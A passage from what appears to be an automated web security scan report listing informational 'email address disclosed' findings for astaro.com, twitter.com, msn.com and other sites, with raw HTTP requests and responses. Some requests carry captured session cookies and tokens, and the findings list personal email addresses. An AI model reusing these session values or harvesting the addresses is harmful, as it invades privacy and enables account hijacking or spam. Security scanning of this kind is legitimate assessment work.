(function($){$.fn.tipsy=function(g){g=$.extend({fade:false,gravity:'n'},g||{});if(!g['offsetTop']){g['offsetTop']=0}if(!g['offsetLeft']){g['offsetLeft']=0}if(!g['header']){g['header']=''}if(!g['foote
...[SNIP]...

21.204. https://sitesearch.omniture.com/center/util/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sitesearch.omniture.com
Path:	/center/util/

Issue detail

The following email addresses were disclosed in the response:

abenigni@oscar.com
joe@foo.com

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:21:49 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 sitesearch.omniture.com:86
X-Cache: MISS from sitesearch.omniture.com
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright (c) 2011 Adobe Systems Incorporated. All rights reserve
...[SNIP]...
<br />eg. joe@foo.com, abenigni@oscar.com
</td>
...[SNIP]...

21.205. http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stackoverflow.com
Path:	/questions/1890512/handling-errors-in-jquerydocument-ready

Issue detail

The following email address was disclosed in the response:

team@stackoverflow.com

Request

Response

21.206. http://static1.degreetree.com/fossa/assets/jsx/ext-2.2.1/ext.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static1.degreetree.com
Path:	/fossa/assets/jsx/ext-2.2.1/ext.js

Issue detail

The following email addresses were disclosed in the response:

licensing@extjs.com
user@domain.com

Request

GET /fossa/assets/jsx/ext-2.2.1/ext.js HTTP/1.1
Host: static1.degreetree.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: A/0QQ+CbVUEnORqOEBRAdzagZCI7KJejo20SMxZqbV59PNiCfGNKfH6fQTrYWGc6
x-amz-request-id: 5B6CD8CD8B0241D3
Date: Wed, 08 Dec 2010 15:26:34 GMT
Expires: Fri, 01 Jan 2100 05:00:00 GMT
Last-Modified: Wed, 08 Dec 2010 06:43:29 GMT
ETag: "e1bc5a82afdf2fb4144d4e451b0b7534"
Accept-Ranges: bytes
Content-Type: text/javascript; charset=utf-8
Content-Length: 598534
Server: AmazonS3
Age: 4839422
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 3ba356d94b0e6057d941da26d0630bddb80dcc4990eab66774c48a83147a53474f1a36e638acbf84
Via: 1.0 f3f50cbd3d1def6bce4a308bcfd00161.cloudfront.net:11180 (CloudFront), 1.0 b652a72ec6ff66c67b4bbaa38dd4336c.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

.../*
* Ext JS Library 2.2.1
* Copyright(c) 2006-2009, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext={version:"2.2.1"};window["undefined"]=window["undefined"];Ext.apply=function(d,e,b){if(b){Ext.apply(d,b)}if(d&&e&&typeof e=="object"){for(var a in e){d[a]=e[a]
...[SNIP]...
on(h,k,j){var i=this.getEl();if(h=="scroll"){i.scrollLeft=k[0];i.scrollTop=k[1]}else{g.setAttribute.call(this,h,k,j)}}})()})();
/*
* Ext JS Library 2.2.1
* Copyright(c) 2006-2009, Ext JS, LLC.
* licensing@extjs.com
*
* http://extjs.com/license
*/

Ext.DomHelper=function(){var n=null;var g=/^(?:br|frame|hr|img|input|link|meta|range|spacer|wbr|area|param|col)$/i;var b=/^table|tbody|tr|td$/i;var a=function
...[SNIP]...
\/([\-\w]+\.)+\w{2,3}(\/[%\-\w]+(\.\w{2,})?)*(([\w\-\.\?\\\/+@&#;`~=%!]*)(\.\w{2,})?)*\/?)/i;return{email:function(e){return b.test(e)},emailText:'This field should be an e-mail address in the format "user@domain.com"',emailMask:/[a-z0-9_\.\-@]/i,url:function(e){return a.test(e)},urlText:'This field should be a URL in the format "http://www.domain.com"',alpha:function(e){return c.test(e)},alphaText:"This field sho
...[SNIP]...

21.207. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41302280/ns/today-entertainment/

Issue detail

The following email address was disclosed in the response:

name@address.com

Request

GET /id/41302280/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.208. http://trw.mediaroom.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trw.mediaroom.com
Path:	/index.php

Issue detail

The following email addresses were disclosed in the response:

John.Wilkerson@trw.com
Lynette.Jackson@trw.com

Request

GET /index.php HTTP/1.1
Host: trw.mediaroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.209. http://tv.msn.com/last-night-on-tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/last-night-on-tv/

Issue detail

The following email address was disclosed in the response:

heymsn@microsoft.com

Request

GET /last-night-on-tv/ HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 33889
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=6e26d8f6fa754507a302411667b60080; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:38:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Last Night
...[SNIP]...
<a href="mailto:heymsn@microsoft.com?subject=Last Night on TV " class="altlink">
...[SNIP]...

21.210. http://twitter.com/JohnsHopkinsSPH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/JohnsHopkinsSPH

Issue detail

The following email address was disclosed in the response:

admiss@jhsph.edu

Request

Response

21.211. http://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/about/contact

Issue detail

The following email address was disclosed in the response:

partner@twitter.com

Request

Response

21.212. http://twitter.com/arnui previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/arnui

Issue detail

The following email address was disclosed in the response:

ariunnar@gmail.com

Request

Response

21.213. http://twitter.com/javascripts/widgets/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/javascripts/widgets/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /javascripts/widgets/widget.js HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:52 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 02:41:27 GMT
Accept-Ranges: bytes
Content-Length: 65153
Cache-Control: max-age=300
Expires: Wed, 02 Feb 2011 16:36:52 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/javascript

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

21.214. https://twitter.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/about/contact

Issue detail

The following email address was disclosed in the response:

partner@twitter.com

Request

Response

21.215. https://twitter.com/signup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/signup

Issue detail

The following email address was disclosed in the response:

Request

Response

21.216. http://webcache.googleusercontent.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webcache.googleusercontent.com
Path:	/search

Issue detail

The following email address was disclosed in the response:

bostonian@mhrmail.com

Request

Response

21.217. http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webreflection.blogspot.com
Path:	/2009/01/32-bytes-to-know-if-your-browser-is-ie.html

Issue detail

The following email address was disclosed in the response:

maverickhunterjames@gmail.com

Request

Response

21.218. https://www.astaro.co.uk/beacon/(beid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.co.uk
Path:	/beacon/(beid

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
myastaro@astaro.com
webmaster@astaro.com

Request

GET /beacon/(beid HTTP/1.1
Host: www.astaro.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:30:22 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: eZSESSIDeu=bv7eodcrp0t34v0n39i8932ve0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 14:30:22 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.co.uk
Content-language: en-GB
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<head>

...[SNIP]...
<a href="mailto:myastaro@astaro.com">myastaro@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.219. http://www.astaro.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:06:41 GMT
ETag: "33573f0b0a043559c8057eb3ce5087cb"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 68532
Date: Tue, 01 Feb 2011 14:28:03 GMT
X-Varnish: 1753556136
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
<a href="mailto:webmaster@astaro.com" title="" class=" depth-1" link_title="">
...[SNIP]...

21.220. http://www.astaro.com/advanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/advanced

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.221. http://www.astaro.com/buy-astaro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/buy-astaro

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.222. http://www.astaro.com/callback previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/callback

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.223. http://www.astaro.com/company/advanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/advanced

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.224. http://www.astaro.com/company/astaro-management-team previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/astaro-management-team

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.225. http://www.astaro.com/company/astaro-supervisory-board previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/astaro-supervisory-board

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.226. http://www.astaro.com/company/career previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/career

Issue detail

The following email addresses were disclosed in the response:

careers@astaro.com
careersus@astaro.com
webmaster@astaro.com

Request

Response

21.227. http://www.astaro.com/company/company-profile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/company-profile

Issue detail

The following email addresses were disclosed in the response:

info@astaro.com
webmaster@astaro.com

Request

Response

21.228. http://www.astaro.com/company/contact-astaro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/contact-astaro

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.229. http://www.astaro.com/company/javascript:void() previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/javascript:void()

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.230. http://www.astaro.com/company/sponsorship previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/sponsorship

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.231. http://www.astaro.com/company/worldwide-offices previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/company/worldwide-offices

Issue detail

The following email addresses were disclosed in the response:

americas@astaro.com
apac@astaro.com
careers@astaro.com
contact@astaro.fr
emea@astaro.com
india@astaro.com
pr_americas@astaro.com
pr_emea@astaro.com
salesch@astaro.com
salesit@astaro.com
salesjp@astaro.com
salesnl@astaro.com
salesuk@astaro.com
webmaster@astaro.com

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:11:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 54335
Date: Tue, 01 Feb 2011 14:23:02 GMT
X-Varnish: 1753551944 1753541581
Age: 717
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
<a href="mailto:americas@astaro.com">americas@astaro.com</a>
...[SNIP]...
<a href="mailto:pr_americas@astaro.com">pr_americas@astaro.com</a>
...[SNIP]...
<a href="mailto:careers@astaro.com">careers@astaro.com </a>
...[SNIP]...
<a href="mailto:emea@astaro.com">emea@astaro.com</a>
...[SNIP]...
<a href="mailto:pr_emea@astaro.com">pr_emea@astaro.com</a>
...[SNIP]...
<a href="mailto:careers@astaro.com">careers@astaro.com </a>
...[SNIP]...
<a href="mailto:apac@astaro.com">apac@astaro.com</a>
...[SNIP]...
<a href="mailto:salesnl@astaro.com">salesnl@astaro.com</a>
...[SNIP]...
<a href="mailto:contact@astaro.fr">contact@astaro.fr</a>
...[SNIP]...
<a href="mailto:india@astaro.com">india@astaro.com</a>
...[SNIP]...
<a href="mailto:salesit@astaro.com">salesit@astaro.com</a>
...[SNIP]...
<a href="mailto:salesjp@astaro.com">salesjp@astaro.com</a>
...[SNIP]...
<a href="mailto:apac@astaro.com">apac@astaro.com</a>
...[SNIP]...
<a href="mailto:salesch@astaro.com">salesch@astaro.com</a>
...[SNIP]...
<a href="mailto:salesuk@astaro.com">salesuk@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com" title="" class=" depth-1" link_title="">
...[SNIP]...

21.232. http://www.astaro.com/gateway/builder/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/gateway/builder/settings

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.233. http://www.astaro.com/javascript:void() previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/javascript:void()

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.234. http://www.astaro.com/landingpages/data/en-privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/landingpages/data/en-privacy-policy.html

Issue detail

The following email addresses were disclosed in the response:

dataprotectionofficer@astaro.com
feedback@astaro.com

Request

GET /landingpages/data/en-privacy-policy.html HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 13 Dec 2010 13:42:06 GMT
ETag: "19da07-fd9-deab8780"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 4057
Date: Tue, 01 Feb 2011 14:29:45 GMT
X-Varnish: 1753558107 1753558055
Age: 6
Via: 1.1 varnish
Connection: close

<html>
<head><title>Astaro Privacy Policy</title></head>
<link rel="stylesheet" type="text/css" href="../styles.css" /><link rel="stylesheet" type="text/css" href="../styles.css" />
<style type="text/
...[SNIP]...
<a href="mailto:feedback@astaro.com">feedback@astaro.com</a>
...[SNIP]...
<a href="mailto:feedback@astaro.com">feedback@astaro.com</a>
...[SNIP]...
<a href="mailto:dataprotectionofficer@astaro.com">dataprotectionofficer@astaro.com</a>
...[SNIP]...

21.235. http://www.astaro.com/legal-statement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/legal-statement

Issue detail

The following email addresses were disclosed in the response:

info@astaro.com
webmaster@astaro.com

Request

Response

21.236. http://www.astaro.com/newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/newsletter

Issue detail

The following email addresses were disclosed in the response:

feedback@astaro.com
webmaster@astaro.com

Request

Response

21.237. http://www.astaro.com/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.238. http://www.astaro.com/products/access-points previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/access-points

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.239. http://www.astaro.com/products/astaro-clients previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-clients

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.240. http://www.astaro.com/products/astaro-command-center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-command-center

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.241. http://www.astaro.com/products/astaro-red previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-red

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.242. http://www.astaro.com/products/astaro-security-gateway-software-appliance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-security-gateway-software-appliance

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.243. http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-security-gateway-virtual-appliance-for-vmware

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.244. http://www.astaro.com/products/astaro-smart-installer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-smart-installer

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.245. http://www.astaro.com/products/hardware-appliances previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/hardware-appliances

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.246. https://www.astaro.com/beacon/(beid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/beacon/(beid

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
myastaro@astaro.com
webmaster@astaro.com

Request

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 13:58:57 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:58:57 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:myastaro@astaro.com">myastaro@astaro.com</a>
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.247. https://www.astaro.com/design/en/javascript/jquery.dimensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/design/en/javascript/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Request

GET /design/en/javascript/jquery.dimensions.js HTTP/1.1
Host: www.astaro.com
Connection: keep-alive
Referer: https://www.astaro.com/user/login
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; session_start_time=1296568531414; k_visit=2; push_time_start=1296569531420; has_js=1; __unam=fa38af9-12dddaf19a7-13ff2714-3; __utma=112476180.1215039085.1296493738.1296504424.1296568533.3; __utmc=112476180; __utmb=112476180.3.10.1296568533; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296568533; eZSESSIDen=3arq6oafh8mmgccr289cup83h1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 13:55:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 05 Dec 2008 08:20:36 GMT
ETag: "1aa0c2-d73-5a02bd00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 3443

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

21.248. https://www.astaro.com/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en

Issue detail

The following email address was disclosed in the response:

webmaster@astaro.com

Request

Response

21.249. https://www.astaro.com/en/content/advancedsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en/content/advancedsearch

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

GET /en/content/advancedsearch HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-4; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.4.10.1296568533;

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 13:58:02 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Tue, 01 Feb 2011 13:58:02 GMT
X-Powered-By: eZ Publish
Served-by: www.astaro.com
Content-language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<meta name="honeypot" value="maweb@who-is-using-me.com" />
...[SNIP]...
<a href="mailto:webmaster@astaro.com">
...[SNIP]...

<form><input type="hidden" name="honeypot" value="mailto:faweb@who-is-using-me.com" /></form>
<span style="color: white;">aweb@who-is-using-me.com</span>
...[SNIP]...

21.250. https://www.astaro.com/en/myastaro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.astaro.com
Path:	/en/myastaro

Issue detail

The following email addresses were disclosed in the response:

aweb@who-is-using-me.com
caweb@who-is-using-me.com
faweb@who-is-using-me.com
maweb@who-is-using-me.com
webmaster@astaro.com

Request

GET /en/myastaro HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
